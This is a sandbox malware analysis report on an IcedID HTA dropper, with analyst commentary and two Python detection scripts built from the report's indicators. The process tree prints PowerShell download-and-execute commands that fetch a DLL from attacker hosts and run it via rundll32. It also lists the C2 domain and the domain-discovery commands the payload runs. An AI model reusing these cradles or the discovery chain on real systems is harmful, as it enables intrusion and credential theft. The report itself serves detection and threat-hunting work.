Analysis

max time kernel: 149s
max time network: 140s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 04-02-2023 22:06

Tasks:
  static1 (static task)
  behavioral1 (behavioral task): sample 2.hta, resource win7-20220812-en
  behavioral2 (behavioral task): sample 2.hta, resource win10v2004-20221111-en

The behavioural results on this page (platform windows7_x64, memory regions at 0x000007FE... addresses) are from behavioral1, the Windows 7 x64 run.
General

Target: 2.hta
Size: 1KB
MD5: 78b6f14f36098c269c3d03a29eb35bc8
SHA1: afd76bfe0d6ac105730b218152d0a650b6a869b7
SHA256: c815343206eab5b6d29bea2d12f02bf8f446944554f053203afc414acc77e859
SHA512: 57b5a24f6c2610961e5c08d64872290d5b1399a80fc4335e60b88e3d20a679576a108d313b9a710b59e604732e0ea6e91313d65e16a10eb3eda3fe4e503d9712
Malware Config

Extracted URL: http://helthbrotthersg.com/view.png
Extracted URL: https://transfer.sh/get/vpiHmi/invoice.pdf
Extracted config:
  Family: icedid
  Campaign: 3954321778
  C2: ehonlionetodo.com

The two URLs are the stage-one download locations visible in the PowerShell command lines; the IcedID campaign ID and C2 domain were recovered from the payload DLL itself.
Signatures

Blocklisted process makes network request (14 IoCs)
Processes (flow, pid, process):
  4   884   mshta.exe
  6   884   mshta.exe
  9   672   powershell.exe
  10  288   powershell.exe
  11  672   powershell.exe
  14  1436  rundll32.exe
  16  1436  rundll32.exe
  18  1436  rundll32.exe
  20  1436  rundll32.exe
  21  1436  rundll32.exe
  22  1436  rundll32.exe
  23  1436  rundll32.exe
  25  1436  rundll32.exe
  28  1436  rundll32.exe
Nine of the fourteen flows belong to the 64-bit rundll32.exe (pid 1436), the process that runs the payload; the remainder belong to mshta.exe and the two PowerShell download commands.

Downloads MZ/PE file
The file fetched from http://helthbrotthersg.com/view.png and written as C:\Users\Public\classic.jpg is a PE (291KB, see Downloads), not an image; the .jpg extension is cosmetic and rundll32.exe does not check it.

Loads dropped DLL (3 IoCs)
Processes (pid, process):
  1912  rundll32.exe
  1436  rundll32.exe
  1436  rundll32.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc. For this sample the supporting artifact is \Users\Admin\AppData\Local\Temp\sqlite64.dll (1.8MB, listed under Downloads): browser credential and cookie stores are SQLite databases, and the payload drops its own SQLite library to read them.
Accesses Microsoft Outlook profiles (1 TTP, 7 IoCs)
Processes:
  rundll32.exe: Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  rundll32.exe: Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  rundll32.exe: Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  rundll32.exe: Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  rundll32.exe: Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  rundll32.exe: Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  rundll32.exe: Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
The process sweeps every Office version key from 11.0 to 16.0 plus the legacy Windows Messaging Subsystem path instead of reading the installed version. A legitimate Outlook opens only its own version's key, and Office 13.0 was never shipped, so a process touching the 13.0 path can only be enumerating; the sweep itself is a usable detection signal.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
That description is the sandbox's generic text for the signature. Nothing else in this report (no encryption, no mass file writes in the Downloads list) supports ransomware; drive enumeration here fits the host fingerprinting the rest of the process tree shows.
Discovers systems in the same network (1 TTP, 2 IoCs)
The two IoCs correspond to the net view /all /domain and net view /all commands in the process tree.

Gathers network information (2 TTPs, 1 IoC)
Uses commandline utility to view network configuration.
Processes (pid, process):
  908  ipconfig.exe

Gathers system information (1 TTP, 1 IoC)
Runs systeminfo.exe.
Modifies Internet Explorer settings (1 IoC)
Processes:
  mshta.exe: Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main
Expected for any HTA, since mshta.exe hosts the MSHTML engine; informational on its own.
Modifies registry class (2 IoCs)
Processes:
  rundll32.exe: Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\CLSID\{BC5BB61C-04A9-F961-37F7-BFEC8054F70F}
  rundll32.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\CLSID\{BC5BB61C-04A9-F961-37F7-BFEC8054F70F}\ = cc72ba57e4cb079a8007ec9e049a21acef10fb6fa4d269ccfce51332d670d70cdc4e85174a9ee048f269da823947da60a92156bb91e151aefd20156738a287bdff083400f4ab31c936ca1e4a38444b02cc7569d69337671d374488161fcd293874418d2315f1296d8fd215db09755149d0133d91db267f73f33a888622773da3435edd197a631e82992fd70e58ca1fe575b00fade568b55f62bf86bef6484da3843c499b3a70444f47cb9aac9da48916722140b802613b1f4e444706c78cbe0a8c8fef6c24cc110f80c32456cee6fe712c475705c986a4d62f40a083c1f041
The key lives under the user's HKCU\Software\Classes\CLSID hive but carries no InprocServer32 or other COM registration in this report, only an opaque binary default value. Treat it as a data store written by the payload (pid 1436 per the process tree) rather than a registered COM class, and include the CLSID in host IoC sweeps.
Runs net.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes (pid, process):
  672   powershell.exe
  288   powershell.exe
  1436  rundll32.exe
  1436  rundll32.exe
  1436  rundll32.exe
  1436  rundll32.exe
Suspicious use of AdjustPrivilegeToken (42 IoCs)
Processes:
  672   powershell.exe: SeDebugPrivilege
  288   powershell.exe: SeDebugPrivilege
  1760  WMIC.exe (the following sequence is recorded twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
The three numeric entries are privilege LUIDs the sandbox did not resolve to names (33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege). wmic.exe enabling every privilege in its token and powershell.exe enabling SeDebugPrivilege are both routine start-up behaviour of those binaries, so this signature is informational here; the interesting fact is who launched them (pid 1436).
Suspicious use of WriteProcessMemory (58 IoCs)
Processes (parent pid/process wrote to memory of child pid/process; repeated entries collapsed with a count):
  884   mshta.exe     -> 288   powershell.exe  (x4)
  884   mshta.exe     -> 672   powershell.exe  (x4)
  884   mshta.exe     -> 1912  rundll32.exe    (x7)
  1912  rundll32.exe  -> 1436  rundll32.exe    (x4)
  1436  rundll32.exe  -> 1600  cmd.exe         (x3)
  1600  cmd.exe       -> 564   chcp.com        (x3)
  1436  rundll32.exe  -> 1760  WMIC.exe        (x3)
  1436  rundll32.exe  -> 908   ipconfig.exe    (x3)
  1436  rundll32.exe  -> 1172  systeminfo.exe  (x3)
  1436  rundll32.exe  -> 1148  net.exe         (x3)
  1148  net.exe       -> 1776  net1.exe        (x3)
  1436  rundll32.exe  -> 628   nltest.exe      (x3)
  1436  rundll32.exe  -> 2028  nltest.exe      (x3)
  1436  rundll32.exe  -> 1712  net.exe         (x3)
  1436  rundll32.exe  -> 848   net.exe         (x3)
  1436  rundll32.exe  -> 1216  net.exe         (x3)
  1216  net.exe       -> 2020  net1.exe        (x3)
outlook_office_path (1 IoC)
Processes:
  rundll32.exe: Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

outlook_win_path (1 IoC)
Processes:
  rundll32.exe: Key opened \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
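The Outlook version sweep recorded in the signatures above is a cheap, high-signal detection on registry telemetry. The following is an added example, not code from the sandbox, this report or the malware: it runs over constructed registry-open events (pid, image, key) built from the seven Outlook IoCs listed in this report, plus one constructed benign OUTLOOK.EXE event for contrast, and flags any process that opens Outlook profile keys under three or more distinct Office version numbers. The function name outlook_profile_sweeps, the threshold and the benign event are assumptions of the example.

```python
"""Added example (not code from the sandbox, the report or the malware): flag a
process that sweeps Outlook profile keys across Office versions."""
import re
from collections import defaultdict

# Values taken from the IoCs in this report.
USER_HIVE = r"\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000"
PROFILE_TAIL = r"\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"
WMS_KEY = (USER_HIVE + r"\Software\Microsoft\Windows NT\CurrentVersion"
           r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676")


def office_key(version):
    """Build the per-version Outlook profile key path used by the IoCs."""
    return USER_HIVE + r"\Software\Microsoft\Office" + "\\" + version + PROFILE_TAIL


# Constructed registry-open events (pid, image, key) modelled on the IoCs above;
# the OUTLOOK.EXE event (pid 5000) is benign noise added for contrast.
REG_EVENTS = [
    (1436, r"C:\Windows\system32\rundll32.exe", office_key(v))
    for v in ("11.0", "12.0", "13.0", "14.0", "15.0", "16.0")
] + [
    (1436, r"C:\Windows\system32\rundll32.exe", WMS_KEY),
    (5000, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", office_key("16.0")),
]

OFFICE_RE = re.compile(r"\\Software\\Microsoft\\Office\\(\d+\.\d+)\\Outlook\\Profiles\\", re.I)
WMS_RE = re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.I)


def outlook_profile_sweeps(events, min_versions=3):
    """Return (pid, image_name, versions, touched_legacy_path) for every process that
    opened Outlook profile keys under at least min_versions distinct Office versions.

    A real Outlook opens only its own version's key; a sweep from 11.0 to 16.0 is a
    fingerprinting routine. Office 13.0 never shipped, so its presence alone is a tell.
    """
    per_pid = defaultdict(lambda: {"image": "", "versions": set(), "legacy": False})
    for pid, image, key in events:
        rec = per_pid[pid]
        rec["image"] = image
        m = OFFICE_RE.search(key)
        if m:
            rec["versions"].add(m.group(1))
        if WMS_RE.search(key):
            rec["legacy"] = True
    hits = []
    for pid, rec in per_pid.items():
        versions = sorted(rec["versions"], key=float)
        if len(versions) >= min_versions:
            hits.append((pid, rec["image"].rsplit("\\", 1)[-1], versions, rec["legacy"]))
    return hits


if __name__ == "__main__":
    for pid, name, versions, legacy in outlook_profile_sweeps(REG_EVENTS):
        print(f"pid {pid} ({name}) swept Office {', '.join(versions)}; legacy WMS path: {legacy}")
```

On real telemetry the same function applies to Sysmon event ID 12/13 or EDR registry-open records; the threshold of three versions keeps a genuine Outlook (one version) and a typical MAPI client (one version plus the Windows Messaging Subsystem path) out of the results.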
Processes

C:\Windows\SysWOW64\mshta.exe (pid 884)
  command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2.hta"
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('http://helthbrotthersg.com/view.png', 'C:\Users\Public\classic.jpg')
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('https://transfer.sh/get/vpiHmi/invoice.pdf', 'C:\Users\Public\invoice.pdf'); Start-Process C:\Users\Public\invoice.pdf
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\rundll32.exe (pid 1912)
    command line: "C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\rundll32.exe (pid 1436)
      command line: "C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
      - Blocklisted process makes network request
      - Loads dropped DLL
      - Accesses Microsoft Outlook profiles
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      - outlook_office_path
      - outlook_win_path

      C:\Windows\system32\cmd.exe (pid 1600)
        command line: cmd.exe /c chcp >&2
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\chcp.com (pid 564)
          command line: chcp

      C:\Windows\System32\Wbem\WMIC.exe (pid 1760)
        command line: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\system32\ipconfig.exe (pid 908)
        command line: ipconfig /all
        - Gathers network information

      C:\Windows\system32\systeminfo.exe (pid 1172)
        command line: systeminfo
        - Gathers system information

      C:\Windows\system32\net.exe (pid 1148)
        command line: net config workstation
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe (pid 1776)
          command line: C:\Windows\system32\net1 config workstation

      C:\Windows\system32\nltest.exe
        command line: nltest /domain_trusts

      C:\Windows\system32\nltest.exe
        command line: nltest /domain_trusts /all_trusts

      C:\Windows\system32\net.exe
        command line: net view /all /domain
        - Discovers systems in the same network

      C:\Windows\system32\net.exe
        command line: net view /all
        - Discovers systems in the same network

      C:\Windows\system32\net.exe (pid 1216)
        command line: net group "Domain Admins" /domain
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe (pid 2020)
          command line: C:\Windows\system32\net1 group "Domain Admins" /domain

Reading the tree: the image paths are under SysWOW64 while the command lines name System32, which means the 32-bit mshta.exe started 32-bit children under WOW64 file-system redirection. The 32-bit rundll32.exe (pid 1912) then starts the native 64-bit C:\Windows\system32\rundll32.exe (pid 1436) with the same module and export, which is what rundll32.exe does when handed a DLL of the other bitness; it is the 64-bit process that performs all the network, Outlook and discovery activity. classic.jpg is the downloaded view.png, a PE DLL (see "Downloads MZ/PE file" and the 291KB entry under Downloads) entered through its PluginInit export. invoice.pdf is fetched separately and opened for the user with Start-Process, presumably as a decoy document. The discovery run from pid 1436 (installed AV products via the SecurityCenter2 WMI namespace, ipconfig /all, systeminfo, net config workstation, nltest /domain_trusts, net view, net group "Domain Admins" /domain) is a fixed sequence of living-off-the-land commands from a single rundll32 parent and is a strong behavioural detection on its own; the cmd /c chcp >&2 call collects the console code page the same way.
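The chain above (script host to PowerShell download cradle, rundll32 loading a PE with an image extension, a 32-bit to 64-bit rundll32 hop, then a discovery burst from one parent) can be expressed as process-telemetry rules. The following is an added example, not code from the sandbox, this report or the malware. It runs over constructed Sysmon-style process-creation events (pid, ppid, image, command line) whose values are copied from the process tree in this report, plus two constructed benign events (an Explorer session running a single ipconfig) so the rules have something to ignore. The rule names, the threshold and the parent pid 1 for the root processes are assumptions of the example.

```python
"""Added example (not code from the sandbox, the report or the malware): process-
telemetry rules for the mshta -> PowerShell -> rundll32 -> discovery chain."""
import re
from collections import defaultdict

# Constructed events modelled on the process tree in this report:
# (pid, ppid, image_path, command_line). Illustrative, not captured from a host.
EVENTS = [
    (884, 1, r"C:\Windows\SysWOW64\mshta.exe",
     r'"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2.hta"'),
    (288, 884, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -Exec Bypass -NoP -C (new-object system.net.webclient)"
     r".downloadFile('http://helthbrotthersg.com/view.png', 'C:\Users\Public\classic.jpg')"),
    (672, 884, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -Exec Bypass -NoP -C (new-object system.net.webclient)"
     r".downloadFile('https://transfer.sh/get/vpiHmi/invoice.pdf', 'C:\Users\Public\invoice.pdf');"
     r" Start-Process C:\Users\Public\invoice.pdf"),
    (1912, 884, r"C:\Windows\SysWOW64\rundll32.exe",
     r'"C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit'),
    (1436, 1912, r"C:\Windows\system32\rundll32.exe",
     r'"C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit'),
    (1760, 1436, r"C:\Windows\System32\Wbem\WMIC.exe",
     r"WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List"),
    (908, 1436, r"C:\Windows\system32\ipconfig.exe", "ipconfig /all"),
    (1172, 1436, r"C:\Windows\system32\systeminfo.exe", "systeminfo"),
    (1148, 1436, r"C:\Windows\system32\net.exe", "net config workstation"),
    (628, 1436, r"C:\Windows\system32\nltest.exe", "nltest /domain_trusts"),
    (2028, 1436, r"C:\Windows\system32\nltest.exe", "nltest /domain_trusts /all_trusts"),
    (1712, 1436, r"C:\Windows\system32\net.exe", "net view /all /domain"),
    (848, 1436, r"C:\Windows\system32\net.exe", "net view /all"),
    (1216, 1436, r"C:\Windows\system32\net.exe", 'net group "Domain Admins" /domain'),
    # Benign noise (constructed): an admin running one discovery command from Explorer.
    (3000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (3001, 3000, r"C:\Windows\system32\ipconfig.exe", "ipconfig /all"),
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Download-cradle markers in a PowerShell command line.
CRADLE_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|net\.webclient", re.I)
# rundll32 <module>,<export>; the module path may be quoted.
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",\s]+)"?\s*,\s*(\S+)', re.I)
# Host/domain discovery commands seen in the report, labelled by category.
DISCOVERY = [
    ("av_products", re.compile(r"securitycenter2.*antivirusproduct", re.I)),
    ("ipconfig", re.compile(r"^ipconfig\b.*/all", re.I)),
    ("systeminfo", re.compile(r"^systeminfo\b", re.I)),
    ("workstation", re.compile(r"^net\s+config\s+workstation", re.I)),
    ("domain_trusts", re.compile(r"^nltest\b.*/domain_trusts", re.I)),
    ("net_view", re.compile(r"^net\s+view\b", re.I)),
    ("domain_admins", re.compile(r'^net\s+group\s+"domain admins"', re.I)),
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_wow64(path):
    return "\\syswow64\\" in path.lower()


def rundll32_target(cmdline):
    """Return (module_path, export) from a rundll32 command line, or None."""
    m = RUNDLL_RE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


def detect(events, burst_threshold=4):
    """Return (rule, pid) findings over a list of process-creation events."""
    by_pid = {e[0]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e[1]].append(e)
    findings = []
    for pid, ppid, image, cmd in events:
        name = image_name(image)
        parent = by_pid.get(ppid)
        pname = image_name(parent[2]) if parent else ""
        # 1. Script host (HTA/VBS/JS) launching a PowerShell download cradle.
        if name == "powershell.exe" and pname in SCRIPT_HOSTS and CRADLE_RE.search(cmd):
            findings.append(("download_cradle_from_script_host", pid))
        if name == "rundll32.exe":
            # 2. rundll32 loading a module whose extension hides that it is a PE.
            target = rundll32_target(cmd)
            if target and not target[0].lower().endswith(".dll"):
                findings.append(("rundll32_disguised_dll", pid))
            # 3. 32-bit rundll32 relaunching the native 64-bit one (64-bit payload DLL).
            if pname == "rundll32.exe" and is_wow64(parent[2]) and not is_wow64(image):
                findings.append(("rundll32_arch_hop", pid))
    # 4. One parent fanning out into several distinct discovery commands.
    for ppid, kids in children.items():
        seen = {label for _, _, _, cmd in kids for label, rx in DISCOVERY if rx.search(cmd)}
        if len(seen) >= burst_threshold:
            findings.append(("discovery_burst", ppid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:34} pid={pid}")
```

Rule 4 deliberately keys on the parent rather than on any single command: ipconfig /all or systeminfo from an administrator's shell is normal, while four or more distinct discovery categories under one rundll32.exe is not. On real data, add a time window to the grouping so a long-lived parent does not accumulate unrelated children.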
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 340B
  MD5: 2459c952068a2b2153873409df5e7814
  SHA1: 792ac7137f576ae525f5227cf7386b71863f9636
  SHA256: 023cef2e6e7976b88df6d8e0030a86897fd9296630631780c21b12bcb3e764ec
  SHA512: bdb3157b05a2671c4ec573088e1c9c6b274ae0eb9f1f3dbde8cada2db8bba73d042035cf9faa8df6877831638e983a9a1860c651626531bbef8eabd5574ca33d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 88aeab0039cfae0c1162500b5e8691e8
  SHA1: b864d7f26373bac3343073df41d99ad4d0248a9b
  SHA256: d6003bea1e577c4150d70a7b79bc50ee445458966a01e6bf7154ff0a10929578
  SHA512: 07aff64fb142ad75f8351bdc39da6f895536d30741ed762f632d27e56d9d2b8c6eca7d79b383fc176e621891318714e12239e6124a710fadf92df6b0a0878d7f

C:\Users\Public\classic.jpg
  Filesize: 291KB
  MD5: 6b1e64957316e65198e3a1f747402bd6
  SHA1: f4df8c9d37a76eadf1125a74865032d83920123b
  SHA256: fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe
  SHA512: dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff
  This is the payload DLL downloaded as view.png and loaded by rundll32.exe through its PluginInit export; the hashes above are the IoCs to pivot on.

\??\PIPE\NETLOGON
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  These four values are the digests of zero bytes: no pipe content was captured. The entry only records that the NETLOGON named pipe was opened, which is consistent with the nltest /domain_trusts and net ... /domain queries in the process tree, and it is not a file IoC.

\Users\Admin\AppData\Local\Temp\sqlite64.dll
  Filesize: 1.8MB
  MD5: 26d773a69f6fad3200d49a7aaa77752b
  SHA1: 3970ffe8aefe0c30daaec65b85fb103c0fc0f2a7
  SHA256: fca6b7fe66ad9973f18f407e83b56dacd04197cbd35efc498a342d73d6a113e5
  SHA512: 0041b52514460dda19dd065fc46393f6fbe248a4c62fce28e0819abd952756996b34fdea286eb7814a7c868a12656a065278932760e61e53f7102b0dba324e4f
  A SQLite library dropped to %TEMP%; see "Reads user/profile data of web browsers" above. The library itself may be a clean build, so hunt on the path and the dropping process rather than on these hashes alone.

\Users\Public\classic.jpg
  Filesize: 291KB
  MD5: 6b1e64957316e65198e3a1f747402bd6
  SHA1: f4df8c9d37a76eadf1125a74865032d83920123b
  SHA256: fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe
  SHA512: dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff
  (same file as C:\Users\Public\classic.jpg above, recorded under the drive-relative path)
Memory dumps (pid-ordinal-range; mapping.dmp entries have no size):

memory/288-61-0x0000000070600000-0x0000000070BAB000-memory.dmp  5.7MB
memory/288-60-0x0000000070600000-0x0000000070BAB000-memory.dmp  5.7MB
memory/288-54-0x0000000000000000-mapping.dmp
memory/564-78-0x0000000000000000-mapping.dmp
memory/628-85-0x0000000000000000-mapping.dmp
memory/672-62-0x0000000070600000-0x0000000070BAB000-memory.dmp  5.7MB
memory/672-59-0x0000000070600000-0x0000000070BAB000-memory.dmp  5.7MB
memory/672-56-0x0000000075DF1000-0x0000000075DF3000-memory.dmp  8KB
memory/672-55-0x0000000000000000-mapping.dmp
memory/848-89-0x0000000000000000-mapping.dmp
memory/908-80-0x0000000000000000-mapping.dmp
memory/1148-83-0x0000000000000000-mapping.dmp
memory/1172-81-0x0000000000000000-mapping.dmp
memory/1216-90-0x0000000000000000-mapping.dmp
memory/1436-76-0x000007FEFB731000-0x000007FEFB733000-memory.dmp  8KB
memory/1436-70-0x0000000001AF0000-0x0000000001B3C000-memory.dmp  304KB
memory/1436-69-0x0000000000120000-0x0000000000129000-memory.dmp  36KB
memory/1436-67-0x0000000000000000-mapping.dmp
memory/1600-77-0x0000000000000000-mapping.dmp
memory/1712-88-0x0000000000000000-mapping.dmp
memory/1760-79-0x0000000000000000-mapping.dmp
memory/1776-84-0x0000000000000000-mapping.dmp
memory/1912-63-0x0000000000000000-mapping.dmp
memory/2020-91-0x0000000000000000-mapping.dmp
memory/2028-86-0x0000000000000000-mapping.dmp

The 5.7MB regions at 0x70600000 in both PowerShell processes are the same range in each and are most likely a loaded system module rather than malware; the 8KB region at 0x000007FEFB731000 in pid 1436 sits in the 64-bit system DLL address range. The dump to start with is the 304KB region at 0x01AF0000-0x01B3C000 in pid 1436, the only sizeable private region in the payload process and close in size to the 291KB classic.jpg, so it is the likely place to find the unpacked payload and the configuration (campaign 3954321778, C2 ehonlionetodo.com) the extractor reported.